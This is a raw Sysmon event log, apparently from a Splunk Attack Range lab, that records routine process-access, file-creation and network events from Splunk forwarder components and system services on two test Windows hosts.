10341000x8000000000000000103972Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:05.342{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103971Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:05.342{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103970Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:05.342{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103969Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:05.342{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103968Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:05.342{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B2E1-615A-E101-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103967Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:05.342{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2E1-615A-E101-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103966Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:05.342{58E9C193-B2E1-615A-E101-00000000FC01}6472C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103977Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:06.842{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAB95D6EFDA153514503BA678DC60DC6,SHA256=606CC4D705B291DC5714C46ED644074C3901380C8B78564C1F1838A4F4153746,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081830Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:06.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=037CDE6CDF038B63963EC1C77F1D63BF,SHA256=EA5FF8A93A98A67444DCF32B945775A06B6AC1851DB298F3E476D021A78979CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103976Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:06.342{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FEFC8C5BE79DE16E92CA6901A1449579,SHA256=2903DE4978E5CBE9374E79F8C54D36465429B94BD72E37C89273E3B1F07FA124,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103975Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:04.470{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49563-false10.0.1.12-8000- 23542300x8000000000000000103978Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:07.842{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB35F4EAE8C61D24BEF14129EE018328,SHA256=72FFF625C52F7A8755661AE776916282DE140A573879901637AD83831664E273,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081831Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:07.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6F59DDF0F08F8C23A291EE59A1F5F54,SHA256=CB0383D58BA95DA77033843EA0AD3BFE7E325379BB5665683073328E4D76056E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103979Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:08.857{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC3FFEAE695E7E3B2F4692AAF3C0A426,SHA256=4F4DAB7BF0D60BF8DBEA8F97B3855678FB3565236B1BFB8DF4DA198B0BEA8D0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081832Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:08.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51A73BCE24B847EAD080313E6FE940CF,SHA256=9039DBBFE0B3C82AB239F97096E5D83B8CA5D8B97E4677F8ACB222ACF0810A35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103980Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:09.857{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A69A6B71EE4FF27A15F6386E4A7E4EB,SHA256=48A74C4EA0D070A75C5E9F7EFCC5107523EEF907EBCD622DEA369828F4EFE38B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081833Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:09.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAFD31F301E00F71755BCB72D8ABA13D,SHA256=F5EFFCDB0044A4385ED7E93B96C99DD607FF30DB8389321595C79C861350234B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103981Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:10.904{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FCDCF00C76D5753C58682BDD10BAD3F,SHA256=944D1575A127ECDD3FC33986F03AF0827EF507F926022784134B1D14D2971EB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081834Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:10.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5183184A97CCD766E8D66BDB5AF739B,SHA256=CD159DB32F8C56496588D77B9ED0B2307A6D5BCA958D37B4D1C07FD264CC7A3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081835Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:11.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D030CDF1336B94959BE8FBDF69C3ACDE,SHA256=76E50C7D4E0CA4CD30CAF9E359DFA6E058253707CC1AB9325A3092D6230EB3C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103982Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:10.251{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49564-false10.0.1.12-8000- 23542300x800000000000000081837Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:12.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4B328CAF0B9BC720D1CE48E15472A77,SHA256=642D3E4EBB6DF706ECE4A78D7E0548C917BF26DECB49A16A6D3799A13A81F000,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103983Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:12.123{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D34D956C6A431414491D303B6C1CCE65,SHA256=AF7F6F431243DE9860A96234FFBE3B755CFEB37CA3DFFBDE3904BA2F30DA5517,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081836Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:09.655{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50057-false10.0.1.12-8000- 23542300x800000000000000081838Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:13.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=038CAD9E615F93102A9C4A69B7CBB104,SHA256=8267E4305167A6E492AB27987313601E9391BDCCD3DBB7B0D1A52A081ED4B034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103984Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:13.123{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E4B46EB094C69F918165F8B57FD2766,SHA256=CC85439D34B9A714CDE17E9EAED08032D3D04D54A858E7CC03889B0C9CB4FD11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103985Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:14.154{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52CC129CF1EF3943B035DE3CE104B6CD,SHA256=B75E9B3929124BDB0CC9D14CF817ABDE7770DFCA5428178316AA7CBDAA5F2F9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081839Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:14.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD310711020F22B3D83D4DAC5BD2630F,SHA256=BF0BE3F9E82A8484D87E2C09A7E2B8197DF57EA8C23E55AE5B5C9BC55357C864,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103986Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:15.170{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F46A8A0234B3D513FDBF61AA5BC6D717,SHA256=B0E8F67BB093B2CBBECC584964D697D5A9BF0D00AE5419B4DE20D08CF6D8C99A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081840Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:15.458{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1D54319140BA90FCFF93915E721D505,SHA256=78D78CC71EBA372368E6169BBE7E4E00218B898A24F6E78F8B21A7998AFB22D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081841Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:16.463{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E3AF4C5EBE6AF7B8C93CC9B95E5FCDF,SHA256=BE3FA8E5658D48850F2CD4169FDB9217DF54FE99480CFFEB5B3D6D4BB84D3E44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103987Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:16.214{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27558157BAD7B336DAAC0155AEAA95DA,SHA256=F77BE2DD89AB46B2EFE1A7CA1A13B05F32E10965AD615AA899C57545118F3AFF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103989Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:15.376{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49565-false10.0.1.12-8000- 23542300x8000000000000000103988Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:17.214{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=038885E24302CC54D4A5BF56F50725BE,SHA256=B53A8CF7A833EA489EF6C318EBE2D2C6D21E77650ED2BE191AA40F7A52D12159,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081843Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:17.463{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61E3EDEFE657FEAEED6E1218220C7ED1,SHA256=BB57D11E95A8ACE812C5AC30FCB5B848623BBA157C16FEF5E4D290FB6D1D2C96,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081842Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:14.698{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50058-false10.0.1.12-8000- 23542300x8000000000000000103990Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:18.245{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78C9B25C9E93D8212D41E252C4E90ADA,SHA256=1626BC0ECE78A6B95C8CA4B43A153964F1C0359417E8894723E7100631246F6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081845Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:18.994{2FDD8D40-AC9A-615A-1200-00000000FD01}996NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=F7A618B8BDA8559A281BE059EB0F60FB,SHA256=B0185771C695731CBA937D94AB4A0AA6D8EB56BC2D1F4A80EEE1E08C3B88CC75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081844Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:18.463{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9420568791BB1D2D30D025B9FA9242B7,SHA256=3C5471294D42F1CA9780115438F6D9FC7B42F2A7B0B303420110242F1B798EE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103991Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:19.245{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B6EAC87ACF4747D4F947270C4E38296,SHA256=7C373F8B7B4FA75897265DA395BDC14A7D8A10872648C5F665E5B25C62ABE730,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081846Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:19.463{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A65BD86E35934F83C385DDF5127C151B,SHA256=BC3EF5E670A2025C6E1954BD27A11A582A4979FC275547EC7496C63B82FE0AC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081847Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:20.479{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37E6172D24856566F84117C30034531C,SHA256=C1CD4CCA83E9E60A99AE60A26DCE9AFE9AB21346356F9DB3B05F6553A35B0030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103992Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:20.245{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC08B871F973B0BC20EC0DBF08D177DB,SHA256=B36AB0C7F792FF590620A2954A38DCF0F1DCA01A038B9332748391A4891F1B35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081852Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:21.479{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=040E7BD6C4E174B7753BC6C0034BA0C6,SHA256=834E0CD991C59DE2E8A5AFCD2C31EC1D07A755ABAC5DD5025955D9F6D76525D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081851Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:19.769{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50059-false10.0.1.12-8000- 354300x8000000000000000103994Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:20.389{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 